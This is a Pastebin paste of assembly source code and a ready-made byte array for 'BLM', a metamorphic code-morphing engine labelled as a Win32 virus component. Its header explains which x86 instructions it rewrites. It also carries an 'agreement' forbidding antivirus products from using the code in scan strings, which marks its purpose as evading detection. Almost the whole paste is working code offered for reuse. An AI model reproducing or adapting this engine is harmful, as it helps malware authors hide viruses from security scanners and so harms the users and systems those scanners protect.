API tools faq
paste
Advertisement
FlyFar

Virus.Win32.BLM - Morphing virus - Source Code

FlyFar
Jun 18th, 2023
1,439
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
ASM (NASM) 9.80 KB | Cybersecurity | 0 0
raw download clone embed print report
  1. ; BLM ~ BlueOwls Light Meta
  2. ; *************************
  3. ;
  4. ; Details
  5. ;
  6. ;  Name: BLM (BlueOwls Light Meta)
  7. ;  Date: 16 May 2005
  8. ;  Size: 412 bytes
  9. ;  Morphing power: light
  10. ;  Morphing type: non-expansion
  11. ;  Compatibility: most common x86 and pentium specific (rdtsc/movzx/..)
  12. ;  Platforms: all 32bit (and maybe 16bit) x86 instruction set OSes
  13. ;  Used compiler: FASM 1.60
  14. ;  Bugs: hopefully none
  15. ;
  16. ; Morphing
  17. ;
  18. ;  The following instructions can be morphed:
  19. ;
  20. ;  1. OP reg, reg -> changing the D bit (2)
  21. ;  2. OP (reg,) [(imm32+)reg] -> changing the unused SCALE bits (4)
  22. ;  3. OP (reg,) [(imm32+)reg+reg*1] -> swapping the regs (2)
  23. ;
  24. ;  Any other instruction's size is calculated and skipped.
  25. ;
  26. ; Usage notes
  27. ;
  28. ;  BLM can be usefull for any application which would like to do code
  29. ;  morphing on its own, or other code. There are however, some things
  30. ;  to keep note on:
  31. ;
  32. ;  - Make sure you don't mix data with code, for example:
  33. ;    > CALL _LABEL
  34. ;    > DB "some string",0
  35. ;    > _LABEL:
  36. ;    Would make the meta miscorrectly assume "some string",0 to be
  37. ;    code. So make sure that in the codearea you specify is no data.
  38. ;  - On input, esi is allowed to equal edi, but it is not recommended
  39. ;    if it will cause the meta to morph itself on runtime.
  40. ;  - This code does not need any data,  and only needs to be able  to
  41. ;    execute. It is completely permutatable.
  42. ;
  43. ; Agreement
  44. ;
  45. ;  This  sourcecode  is  meant  to be used  in freeware and  shareware
  46. ;  programs, and therefor it is strictly prohibited to add any of this
  47. ;  code in binary or source format in  scan strings or other detection
  48. ;  methods. If done, it will impact on the sellability of the product,
  49. ;  and can result in high fees and/or trials before court.
  50. ;  YOU HAVE BEEN WARNED
  51.  
  52. use32
  53.  
  54. ; ������������� META SOURCE ���������������������������������������������
  55.  
  56. ; in:   esi(ecx) = start of code to morph
  57. ;       edi(ecx) = start of buffer to put morphed code in
  58. ;       ecx = size of code to morph (and buffer)
  59. ; out:  esi = esi + ecx
  60. ;       edi = edi + ecx
  61. ;       other registers are destroyed (except esp)
  62.  
  63. BLM:        cld
  64.         lea ebx, [esi+ecx]      ; ebx = ptr to end of code to morph
  65. nextcode:   push    ebx
  66.         xor ecx, ecx
  67.         push    4
  68.         pop ebx
  69.         call    .innext
  70.         pop ebx
  71.         rol edx, 7          ; simple RAND function
  72.         neg dx
  73.         cmp ebx, esi
  74.         ja  nextcode
  75.         ret
  76.  
  77. .next:      movsb
  78. .innext:    mov al, [esi]
  79.         and al, 11100111b
  80.         cmp al, 00100110b       ; es/cs/ss/ds segment?
  81.         jz  .next           ; check if more
  82.         mov al, [esi]
  83.         and al, 11111110b
  84.         cmp al, 01100100b       ; fs/gs segment?
  85.         jz  .next           ; check if more
  86.         cmp al, 11110010b       ; repz/repnz?
  87.         jz  .next           ; check if more
  88.         cmp al, 01100110b       ; WORD?
  89.         jnz opcode
  90.         mov bl, 2           ; set WORD size
  91.         jmp .next
  92.  
  93. ; -----------------------------------------------------------------------
  94.  
  95. opcode:     mov al, [esi]
  96.         cmp al, 0fh
  97.         jnz branch_start
  98.         movsb
  99.         or  al, [esi]       ; ????1111
  100.         cmp al, 10001111b
  101.         jz  .6byte          ; -> jxx label32
  102.         cmp al, 10111111b
  103.         jz  .3byte          ; -> movzx/bt?
  104.         jmp .done
  105. .6byte:     movsb
  106.         movsb
  107.         movsb
  108. .3byte:     movsb
  109. .done:      movsb
  110.         ret
  111. branch_start:   shl al, 1
  112.         jc  branch_1xxxxxxx
  113. branch_0xxxxxxx:shl al, 1
  114.         jc  branch_01xxxxxx
  115. branch_00xxxxxx:shl al, 4
  116.         jnc op_rmrm_d
  117. op_eax:     mov al, [esi]
  118.         shr al, 1
  119.         jc  .pr32
  120.         movsb
  121.         movsb
  122.         ret             ; -> op al, imm8
  123. .pr32:      add ecx, ebx        ; -> op eax, imm32
  124.         rep movsb
  125.         movsb
  126.         ret
  127. branch_01xxxxxx:cmp al, 11000000b
  128.         jb  .ncjump
  129.         movsb               ; -> jxx label8
  130. .ncjump:    cmp al, 068h
  131.         jz  do_5byte        ; -> push imm32
  132.         cmp al, 06ah
  133.         jnz .done           ; -> popad/pushad/pop/push/dec/inc (reg)
  134.         stosb               ; -> push imm8
  135. .done:      movsb
  136.         ret
  137.  
  138. op_rmrm_d:  mov al, [esi+1]     ; -> add/or/adc/sbb/and/sub/xor/cmp r/m,r/m
  139.         rcr edx, 1          ; rand true/false
  140.         jc  .nomorph
  141.         cmp al, 11000000b
  142. .nomorph:   jb  op_rm           ; (jc == jb so little optimization)
  143.         lodsb
  144.         xor al, 00000010b
  145.         stosb
  146.         lodsb
  147.         and eax, 00111111b      ; 00000000 00regreg
  148.         shl eax, 5          ; 00000reg reg00000
  149.         shr al, 2           ; 00000reg 00reg000
  150.         or  al, ah          ; 00000xxx 00regreg
  151.         or  al, 11000000b       ; 11regreg
  152.         stosb
  153.         ret
  154.  
  155. branch_1xxxxxxx:shl al, 1
  156.         jc  branch_11xxxxxx
  157. branch_10xxxxxx:shl al, 1
  158.         jc  branch_101xxxxx
  159. branch_100xxxxx:shl al, 1
  160.         jc  branch_01xxxxxx.ncjump  ; -> xchg eax,reg/cwde/cdq/pushf/popf/sahf/lahf
  161. branch_1000xxxx:cmp al, 01000000b
  162.         jae op_rm           ; -> test/xchg/mov/lea/pop r/m(,r/m)
  163.         shl al, 3
  164.         jc  op_rmimm8       ; -> add/or/adc/sbb/and/sub/xor/cmp r/m,imm8
  165.         jmp op_rmimm32      ; -> add/or/adc/sbb/and/sub/xor/cmp r/m,imm32
  166. branch_101xxxxx:shl al, 1
  167.         jc  branch_1011xxxx
  168. branch_1010xxxx:and al, 11100000b
  169.         cmp al, 00100000b
  170.         jb  op_eax          ; -> test eax, imm
  171.         cmp al, 10000000b
  172.         jz  do_5byte        ; -> mov mem32, eax
  173.         movsb
  174.         ret             ; -> movs/stos/lods/scas
  175. branch_1011xxxx:shl al, 1
  176.         jnc branch_1100001x.2byte   ; -> mov reg, imm8
  177.         jmp op_eax.pr32     ; -> mov reg, imm32
  178. do_5byte:   movsd
  179.         movsb
  180.         ret
  181. branch_11xxxxxx:shl al, 1
  182.         jc  branch_111xxxxx
  183. branch_110xxxxx:shl al, 1
  184.         jc  branch_1101xxxx
  185. branch_1100xxxx:cmp al, 11010000b
  186.         jz  branch_1100001x.2byte   ; -> int imm8
  187.         shl al, 1
  188.         jc  branch_1100001x.done    ; -> leave/int 3
  189. branch_11000xxx:shl al, 1
  190.         jc  op_rm_w         ; -> mov r/m, imm
  191. branch_110000xx:shl al, 1
  192.         jc  branch_1100001x
  193.         inc ecx         ; -> rol/ror/rcl/rcr/shl/shr/sal/sar reg, 1
  194.         jmp op_rm
  195. branch_1100001x:shl al, 1
  196.         jc  .done
  197. .3byte:     movsb
  198. .2byte:     movsb               ; -> ret imm16
  199. .done:      movsb
  200.         ret             ; -> ret
  201. branch_1101xxxx:shl al, 2
  202.         jc  branch_1100001x.done    ; -> xlatb
  203. branch_1101x0xx:jmp op_rm           ; -> rol/ror/rcl/rcr/shl/shr/sal/sar reg, 1
  204.  
  205. branch_111xxxxx:shl al, 1
  206.         jc  branch_1111xxxx
  207. branch_1110xxxx:shl al, 1
  208.         jnc branch_11101010     ; -> loop label
  209. branch_11101xxx:cmp al, 00100000b
  210.         jz  branch_111010x0.done    ; -> call label
  211. branch_111010x0:shl al, 2
  212.         jc  branch_11101010
  213. .done:      movsd               ; -> jmp label32
  214.         movsb
  215.         ret
  216. branch_11101010:movsb
  217.         movsb
  218.         ret             ; -> jmp label8
  219. branch_1111xxxx:shl al, 1
  220.         jc  branch_11111xxx
  221. branch_11110xxx:shl al, 2
  222.         jnc branch_11111xxx.done    ; -> cmc
  223. branch_11111x1x:mov al, [esi+1]     ; al = modr/m
  224.         and al, 00111000b
  225.         jnz op_rm           ; -> not/mul/div/idiv
  226.         jmp op_rm_w         ; -> test
  227. branch_11111xxx:shl al, 1
  228.         jc  .done           ; -> clc/stc/cli
  229.         shr al, 1
  230.         jc  op_rm           ; -> inc/dec/call/jmp/push
  231. .done:      movsb
  232.         ret             ; -> cld/std
  233.  
  234. ; -----------------------------------------------------------------------
  235.  
  236. op_rm_w:    mov al, [esi]
  237.         shr al, 1
  238.         jnc op_rmimm8
  239. op_rmimm32: add ecx, ebx        ; imm length will be 4 or 2
  240.         dec ecx
  241. op_rmimm8:  inc ecx         ; imm length = 1 byte
  242. op_rm:      movsb
  243.         lodsb
  244.         stosb
  245.         cmp al, 11000000b       ; op reg, reg
  246.         jae .done
  247.         mov ah, al
  248.         and al, 111b
  249.         shr ah, 6
  250.         jz  .regaddr
  251.         cmp ah, 00000001b
  252.         jz  .ddone
  253.         add ecx, 3          ; op reg, [reg+dword]
  254. .ddone:     inc ecx         ; op reg, [reg+byte]
  255. .cmpsib:    cmp al, 00000100b
  256.         jnz .done
  257.         xor ebx, ebx
  258.         mov eax, ebx
  259.         lodsb               ; 00000000 iiregreg
  260.         shl eax, 2          ; 000000ii regreg00
  261.         xchg    bl, ah          ; 00000000 regreg00
  262.         shl eax, 3          ; 00000reg reg00000
  263.         shr al, 5           ; 00000reg 00000reg
  264.         cmp ah, 4
  265.         jz  .randindex
  266.         cmp al, 4
  267.         jz  .nosib
  268.         or  bl, bl          ; index = 1?
  269.         jnz .nosib
  270.         rcr edx, 1
  271.         jnc .nosib          ; randomly abort switch
  272.         xchg    al, ah
  273.         jmp .nosib
  274. .randindex: mov bl, dl          ; index is random
  275.         and bl, 00000011b
  276. .nosib:     shl al, 5           ; 00000reg reg00000
  277.         shr eax, 3          ; 00000000 regreg00
  278.         mov ah, bl          ; 000000ii regreg00
  279.         shr eax, 2          ; 00000000 iiregreg
  280.         stosb
  281. .done:      rep movsb
  282.         ret
  283. .regaddr:   cmp al, 00000101b       ; op reg, [dword]
  284.         jnz .cmpsib
  285.         movsd
  286.         jmp .done
  287.  
  288. ; ������������� META BINARY ���������������������������������������������
  289.  
  290. ; in:   esi(ecx) = start of code to morph
  291. ;       edi(ecx) = start of buffer to put morphed code in
  292. ;       ecx = size of code to morph (and buffer)
  293. ; out:  esi = esi + ecx
  294. ;       edi = edi + ecx
  295. ;       other registers are destroyed (except esp)
  296.  
  297. BLM:        db 252,141,28,14,83,49,201,106,4,91,232,13,0,0,0,91
  298.         db 193,194,7,102,247,218,57,243,119,234,195,164,138,6,36,231
  299.         db 60,38,116,247,138,6,36,254,60,100,116,239,60,242,116,235
  300.         db 60,102,117,4,179,2,235,227,138,6,60,15,117,19,164,10
  301.         db 6,60,143,116,6,60,191,116,5,235,4,164,164,164,164,164
  302.         db 195,208,224,114,75,208,224,114,20,192,224,4,115,31,138,6
  303.         db 208,232,114,3,164,164,195,1,217,243,164,164,195,60,192,114
  304.         db 1,164,60,104,116,95,60,106,117,1,170,164,195,138,70,1
  305.         db 209,218,114,2,60,192,15,130,179,0,0,0,172,52,2,170
  306.         db 172,131,224,63,193,224,5,192,232,2,8,224,12,192,170,195
  307.         db 208,224,114,52,208,224,114,23,208,224,114,198,60,64,15,131
  308.         db 139,0,0,0,192,224,3,15,130,129,0,0,0,235,124,208
  309.         db 224,114,12,36,224,60,32,114,149,60,128,116,8,164,195,208
  310.         db 224,115,37,235,146,165,164,195,208,224,114,38,208,224,114,27
  311.         db 60,208,116,20,208,224,114,17,208,224,114,73,208,224,114,3
  312.         db 65,235,76,208,224,114,2,164,164,164,195,192,224,2,114,249
  313.         db 235,61,208,224,114,19,208,224,115,12,60,32,116,5,192,224
  314.         db 2,114,3,165,164,195,164,164,195,208,224,114,14,192,224,2
  315.         db 115,17,138,70,1,36,56,117,22,235,10,208,224,114,4,208
  316.         db 232,114,12,164,195,138,6,208,232,115,3,1,217,73,65,164
  317.         db 172,170,60,192,115,76,136,196,36,7,192,236,6,116,70,128
  318.         db 252,1,116,3,131,193,3,65,60,4,117,54,49,219,137,216
  319.         db 172,193,224,2,134,220,193,224,3,192,232,5,128,252,4,116
  320.         db 16,60,4,116,17,8,219,117,13,209,218,115,9,134,196,235
  321.         db 5,136,211,128,227,3,192,224,5,193,232,3,136,220,193,232
  322.         db 2,170,243,164,195,60,5,117,191,165,235,246
  323.  
  324. ; �����������������������������������������������������������������������
  325.  
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!